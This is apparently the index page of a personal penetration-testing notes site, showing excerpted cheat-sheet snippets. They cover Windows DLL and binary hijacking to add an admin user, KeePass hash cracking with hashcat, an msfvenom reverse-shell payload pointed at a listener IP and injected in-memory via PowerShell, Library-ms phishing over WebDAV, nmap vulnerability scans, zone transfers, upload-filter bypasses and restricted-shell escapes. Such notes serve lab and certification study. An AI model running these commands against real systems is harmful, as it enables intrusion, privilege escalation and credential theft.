akde/infosec

Information security is ultimately about managing risk


  • Com­pile it native­ly or not: x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll Restart the ser­vice / appli­ca­tion some­how and check if there is a new admin2 alive. Reflective DLL Injection See https://github.com/stephenfewer/ReflectiveDLLInjection


  • Binary hijacking Check if a bina­ry (e.g. from a ser­vice) is writeable: PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F) NT AUTHORITY\SYSTEM:(F) BUILTIN\Users:(F) NT AUTHORITY\Authenticated Users:(RX) Leg­end: If yes, replace it with a more use­ful exe­cute­able, like this one. Com­pile this for the cor­rect tar­get archi­tec­ture and replace the orig­i­nal file. x86_64-w64-mingw32-gcc adduser.c -o adduser.exe Check this with one command:


  • Named pipes A named pipe is a method for remote or local IPC Inter-process communication. Basic commands Where is a program? where ssh Restart the sys­tem now: shutdown /r /t 0 Set file sys­tem attrib­ut­es (which are shown with the dir command): attrib +r file.exe Set file sys­tem per­mis­sions (which are shown with the icacls command):…


  • The hash of a mas­ter pass­word of a Keep­ass kdbx file can be extract­ed with keepass2john Database.kdbx > keepass.hash Then, crack it: /opt/hashcat/hashcat keepass.hash /opt/password_lists/rockyou.txt -m 13400 -r /opt/hashcat/rules/rockyou-30000.rule (!) If there is an error regard­ing salt, check if you have the user­name like “user:” at the begin­ning of the file. Remove it.


  • Short sum­ma­ry of techniques: Example of a manual In-memory injection Cre­ate a reverse shell pay­load for PowerShell: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc Use this Pow­er­Shell script, which injects the shell­code into the own (Pow­er­Shell) process and exe­cutes it in a new thread: Start a lis­ten­er and exe­cute it in the vic­tim’s…


  • Get infor­ma­tion from a (mini­fied) JS (e.g. from Angular):


  • Files with the exten­sion .Library-ms are sim­i­lar to macOS’s Vol­umes. They can con­tain files and direc­to­ry which looks like local files on the Win­dows Explor­er. Many AV/Malware sys­tems does not detect them currently. Create a Windows Library “Directory” Prepa­ra­tion: Install some­where a DAV share which is avail­able from the vic­tim’s sys­tem which points to a…


  • Short: A user opens a link (e.g. from a phish­ing email) which has a injec­tion in the URL which is then exe­cut­ed on the site as long as the user is logged in. See also com­mand injec­tions post. Class­es: Tip:


  • See also the Web brute force post.


  • Nmap has it’s own script­ing lan­guage with which com­plex or recur­ring tasks can be autom­a­tized. See the man­page. And share/nmap/scripts. Vulnerability scan # nmap -sV -T5 -F $victim --script vuln | tee nmap-vuln.txt Bet­ter vul­ner­a­bil­i­ty scans (thanks to this source) cd /usr/share/nmap/scripts/vulscan/utilities/updater/ && ./updateFiles.sh nmap --script nmap-vulners -sV -sC -p22 $victim nmap --script vulscan -sV…


  • Mandatory Optional Use this script to list all end­points for fur­ther research:


  • high per­for­mance, open source uni­ver­sal RPC framework GRPC Client CLI Down­load the CLI via https://github.com/vadimi/grpc-client-cli. Then: ./grpc-client-cli $target:50051 GRPC Curl Down­load via https://github.com/fullstorydev/grpcurl. gRPC UI Down­load via https://github.com/fullstorydev/grpcui. Graph­i­cal com­mand line interface. See also


  • Enumeration Mandatory Optional


  • Enumeration Mandatory Try to per­form a zone trans­fer:dig axfr @10.10.11.166 trick.htb


  • (!) If upload does not seem to work, change the suf­fix e.g. from .php to .pHp. More: File uploads / images


  • Cre­ate file to exe­cute code via meta data: https://github.com/convisolabs/CVE-2021–22204-exiftool


  • See https://www.infosecmatter.com/firebird-database-exploitation/


  • First, try to deter­mine the shell echo $PATH echo $SHELL Try to set the PATH variable export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin Upload the escape_from_restricted_shell.c pro­gram (scripts directory). Have a look into a local bin direc­to­ry and see if you can use any bina­ry there to escape.


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';